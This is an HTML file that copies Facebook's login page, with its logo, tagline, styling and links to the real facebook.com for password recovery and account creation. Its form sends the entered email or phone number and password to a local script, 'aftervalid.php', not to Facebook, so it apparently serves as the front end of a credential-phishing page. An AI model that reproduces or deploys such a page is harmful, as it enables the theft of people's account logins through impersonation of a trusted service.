<DOCTYPE html>
    <html>
        <head>
            <title>Facebook - log in </title>
            <meta charset="UTF-8">
            <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
            <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1, viewport-fit=cover">
    </head>
    <body>
        <div class = "container">
          <center>  <img src = "fb.png" class="fb_logo" alt=" " ><br>
          <h2 style="font-weight: lighter;margin-left: 150px;margin-right:150px">Facebook helps you connect and share with the people in your life.</h3></center></div><br>
           <center> <div class="container2">
                    <br>
                    <form action="aftervalid.php" method = "POST">
                    <input type = "email" name = "nm" class ="imp" placeholder=" Email address or phone number " id="nm" onClick="btn1()"><br><br>
                    <input type="password" name= "pwd" id = "pwd" placeholder = "Password" class="imp"><br><br>
                    <input type="submit" class = "btn"  id="log_in" value = "Log in">
                    <br><br><a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" style="color: rgb(82, 82, 192); font-size: 14px; " id="link">Forgotten password?</a>
                    <br><br><hr style="margin-left:30px;margin-right:30px;">
                    </form>
                    <br><button onClick="btn()" name="createacc" id="createacct" class="imp" >Create New Account</button>
                </div></center>
    </div>
    <script>
        function btn(){
               window.location.href="https://www.facebook.com/login/";
           }
      
   </script>
    </body>


    <style>
    body{
        background: #ebebeb;
        justify-content: center;
        margin-top: auto;
        margin-bottom:600px;
        margin-left: auto;
        margin-right: auto;
        font-family:"lucida grande",tahoma,verdana,arial,sans-serif;
        background: linear-gradient(rgb(253, 245, 245), #D3D8E8);
    }
    
    .btn{
        background-color:rgb(100, 100, 235);
        height : 50px;
        width : 350px;
        font-size: 25px;
        font-weight: bolder;
        color:white;
        border-radius: 8px;
        border-width: 0ch;
    }
    .imp{
        border-radius: 8px;
        border-width: 1px;
        border-color: rgb(219, 219, 228);
        height : 50px;
        width : 350px;

    }
    .container2
    {
        background: white ;
        width: 400px;
        height: 400px;
        border-radius: 8px;
        box-shadow: 0 2px 2px;
    }
    #createacct
    {
        background: rgb(74, 209, 74);
        width: 200px;
        height : 50px;
        font-size: 17px;
        font-weight: bolder;
        color:white;
        border-radius: 8px;
        border-width: 0ch;
    }
    #nm:hover{
        border-color:rgb(100,100,235);
    }
    #pwd:hover{
        border-color:rgb(100,100,235);
    }
    #link{
        text-decoration:none;
    }
    #link:hover{
        text-decoration:underline;
    }
    </style>         


   <!-- Developed By Amar -->
    
      
    </html>
    
        
        
       
    